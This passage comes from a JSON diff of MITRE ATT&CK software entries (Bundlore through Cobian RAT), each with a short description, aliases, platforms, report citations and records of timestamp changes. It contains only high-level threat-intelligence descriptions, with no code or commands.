macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020.", + "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Bundlore", + "OSX.Bundlore" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:50.199000+00:00\", \"old_value\": \"2025-04-16 20:38:18.925000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5a84dc36-df0d-4053-9b7c-f0c388a57283", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:20.137000+00:00", + "modified": "2025-04-25 14:43:28.496000+00:00", + "name": "CALENDAR", + "description": "[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0025", + "external_id": "S0025" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. 
Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CALENDAR" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:28.496000+00:00\", \"old_value\": \"2025-04-16 20:38:10.875000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "tool", + "id": "tool--5fc81b43-62b5-41b1-9113-c79ae5f030c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-02 19:10:29.513000+00:00", + "modified": "2025-04-25 14:45:20.112000+00:00", + "name": "CARROTBALL", + "description": "[CARROTBALL](https://attack.mitre.org/software/S0465) is an FTP downloader utility that has been in use since at least 2019. [CARROTBALL](https://attack.mitre.org/software/S0465) has been used as a downloader to install [SYSCON](https://attack.mitre.org/software/S0464).(Citation: Unit 42 CARROTBAT January 2020)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0465", + "external_id": "S0465" + }, + { + "source_name": "Unit 42 CARROTBAT January 2020", + "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. 
Retrieved June 2, 2020.", + "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CARROTBALL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:20.112000+00:00\", \"old_value\": \"2025-04-16 20:38:52.338000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b0f13390-cec7-4814-b37c-ccec01887faa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:25.199000+00:00", + "name": "CCBkdr", + "description": "[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0222", + "external_id": "S0222" + }, + { + "source_name": "Talos CCleanup 2017", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + }, + { + "source_name": "Intezer Aurora Sept 2017", + "description": "Rosenberg, J. (2017, September 20). 
Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner. Retrieved February 13, 2018.", + "url": "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CCBkdr" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:25.199000+00:00\", \"old_value\": \"2025-04-16 20:38:30.519000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "tool", + "id": "tool--c9cd7ec9-40b7-49db-80be-1399eddd9c52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:10.197000+00:00", + "modified": "2025-04-25 14:45:28.653000+00:00", + "name": "Cachedump", + "description": "[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system\u2019s registry. (Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0119", + "external_id": "S0119" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. 
Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cachedump" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:28.653000+00:00\", \"old_value\": \"2025-04-16 20:38:56.154000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a705b085-1eae-455e-8f4d-842483d814eb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-22 20:07:15.628000+00:00", + "modified": "2025-04-25 14:44:19.544000+00:00", + "name": "Cadelspy", + "description": "[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0454", + "external_id": "S0454" + }, + { + "source_name": "Symantec Chafer Dec 2015", + "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. 
Retrieved April 17, 2019.", + "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cadelspy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:19.544000+00:00\", \"old_value\": \"2025-04-16 20:38:29.046000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cb7bcf6f-085f-41db-81ee-4b68481661b5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:52.875000+00:00", + "modified": "2025-04-25 14:44:42.237000+00:00", + "name": "CallMe", + "description": "[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0077", + "external_id": "S0077" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. 
Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CallMe" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:42.237000+00:00\", \"old_value\": \"2025-04-16 20:38:35.526000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d20b397a-ea47-48a9-b503-2e2a3551e11d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 18:58:03.614000+00:00", + "modified": "2025-04-25 14:44:46.016000+00:00", + "name": "Cannon", + "description": "[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0351", + "external_id": "S0351" + }, + { + "source_name": "Cannon", + "description": "(Citation: Unit42 Cannon Nov 2018)" + }, + { + "source_name": "Unit42 Cannon Nov 2018", + "description": "Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. 
Retrieved November 26, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" + }, + { + "source_name": "Unit42 Sofacy Dec 2018", + "description": "Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group\u2019s Global Campaign. Retrieved April 19, 2019.", + "url": "https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cannon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:46.016000+00:00\", \"old_value\": \"2025-04-16 20:38:36.652000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b7e9880a-7a7c-4162-bddb-e28e8ef2bf1f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 19:36:02.103000+00:00", + "modified": "2025-04-25 14:44:30.048000+00:00", + "name": "Carbon", + "description": "[Carbon](https://attack.mitre.org/software/S0335) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. 
[Carbon](https://attack.mitre.org/software/S0335) has been selectively used by [Turla](https://attack.mitre.org/groups/G0010) to target government and foreign affairs-related organizations in Central Asia.(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0335", + "external_id": "S0335" + }, + { + "source_name": "Carbon", + "description": "(Citation: ESET Carbon Mar 2017)(Citation: Securelist Turla Oct 2018)" + }, + { + "source_name": "ESET Carbon Mar 2017", + "description": "ESET. (2017, March 30). Carbon Paper: Peering into Turla\u2019s second stage backdoor. Retrieved November 7, 2018.", + "url": "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/" + }, + { + "source_name": "Securelist Turla Oct 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 04). Shedding Skin \u2013 Turla\u2019s Fresh Faces. 
Retrieved November 7, 2018.", + "url": "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Carbon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:30.048000+00:00\", \"old_value\": \"2025-04-16 20:38:31.987000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--751b77e6-af1f-483b-93fe-eddf17f92a64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-02-10 18:20:51.309000+00:00", + "modified": "2025-04-25 14:43:46.592000+00:00", + "name": "Caterpillar WebShell", + "description": "[Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123).(Citation: ClearSky Lebanese Cedar Jan 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0572", + "external_id": "S0572" + }, + { + "source_name": "Caterpillar WebShell", + "description": "(Citation: ClearSky Lebanese Cedar Jan 2021)(Citation: CheckPoint Volatile Cedar March 2015)" + }, + { + "source_name": "ClearSky Lebanese Cedar Jan 2021", + "description": "ClearSky Cyber Security. (2021, January). \u201cLebanese Cedar\u201d APT Global Lebanese Espionage Campaign Leveraging Web Servers. 
Retrieved February 10, 2021.", + "url": "https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf" + }, + { + "source_name": "CheckPoint Volatile Cedar March 2015", + "description": "Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Caterpillar WebShell" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:46.592000+00:00\", \"old_value\": \"2025-04-16 20:38:17.640000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--5bcd5511-6756-4824-a692-e8bb109364af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:43:29.227000+00:00", + "name": "Chaos", + "description": "[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. 
(Citation: Chaos Stolen Backdoor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0220", + "external_id": "S0220" + }, + { + "source_name": "Chaos", + "description": "(Citation: Chaos Stolen Backdoor)" + }, + { + "source_name": "Chaos Stolen Backdoor", + "description": "Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.", + "url": "http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Chaos" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:29.227000+00:00\", \"old_value\": \"2025-04-16 20:38:11.037000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--7acb15b6-fe2c-4319-b136-6ab36ff0b2d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-01-24 16:56:36.108000+00:00", + "modified": "2025-04-25 14:43:49.304000+00:00", + "name": "CharmPower", + "description": "[CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0674", + "external_id": "S0674" + }, + { + 
"source_name": "Check Point APT35 CharmPower January 2022", + "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.", + "url": "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CharmPower" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:49.304000+00:00\", \"old_value\": \"2025-04-16 20:38:18.570000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b2203c59-4089-4ee4-bfe1-28fa25f0dbfe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:05.710000+00:00", + "modified": "2025-04-25 14:44:26.291000+00:00", + "name": "Cherry Picker", + "description": "[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0107", + "external_id": "S0107" + }, + { + "source_name": "Trustwave Cherry Picker", + "description": "Merritt, E.. (2015, November 16). Shining the Spotlight on Cherry Picker PoS Malware. 
Retrieved April 20, 2016.", + "url": "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cherry Picker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:26.291000+00:00\", \"old_value\": \"2025-04-16 20:38:30.864000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6e95feb1-78ee-48d3-b421-4d76663b5c49", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-11-12 20:54:55.974000+00:00", + "modified": "2025-04-25 14:43:43.008000+00:00", + "name": "Clambling", + "description": "[Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0660", + "external_id": "S0660" + }, + { + "source_name": "Trend Micro DRBControl February 2020", + "description": "Lunghi, D. et al. (2020, February). Uncovering DRBControl. 
Retrieved November 12, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Clambling" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:43.008000+00:00\", \"old_value\": \"2025-04-16 20:38:16.175000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cad3ba95-8c89-4146-ab10-08daa813f9de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-05-10 23:19:38.608000+00:00", + "modified": "2025-04-25 14:44:41.142000+00:00", + "name": "Clop", + "description": "[Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. 
[Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0611", + "external_id": "S0611" + }, + { + "source_name": "Clop", + "description": "(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)" + }, + { + "source_name": "Mcafee Clop Aug 2019", + "description": "Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/" + }, + { + "source_name": "Cybereason Clop Dec 2020", + "description": "Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.", + "url": "https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware" + }, + { + "source_name": "Unit42 Clop April 2021", + "description": "Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. 
Retrieved July 30, 2021.", + "url": "https://unit42.paloaltonetworks.com/clop-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Clop" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:41.142000+00:00\", \"old_value\": \"2025-04-16 20:38:35.205000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--cbf646f1-7db5-4dc6-808b-0094313949df", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:38.128000+00:00", + "modified": "2025-04-25 14:44:42.958000+00:00", + "name": "CloudDuke", + "description": "[CloudDuke](https://attack.mitre.org/software/S0054) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: F-Secure The Dukes) (Citation: Securelist Minidionis July 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0054", + "external_id": "S0054" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "Securelist Minidionis July 2015", + "description": "Lozhkin, S.. (2015, July 16). Minidionis \u2013 one more APT with a usage of cloud drives. 
Retrieved April 5, 2017.", + "url": "https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CloudDuke", + "MiniDionis", + "CloudLook" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:42.958000+00:00\", \"old_value\": \"2025-04-16 20:38:35.863000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--aa1462a1-d065-416c-b354-bedd04998c7f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-29 21:40:37.350000+00:00", + "modified": "2025-04-25 14:44:21.097000+00:00", + "name": "Cobian RAT", + "description": "[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0338", + "external_id": "S0338" + }, + { + "source_name": "Cobian RAT", + "description": "(Citation: Zscaler Cobain Aug 2017)" + }, + { + "source_name": "Zscaler Cobian Aug 2017", + "description": "Yadav, A., et al. (2017, August 31). Cobian RAT \u2013 A backdoored RAT. 
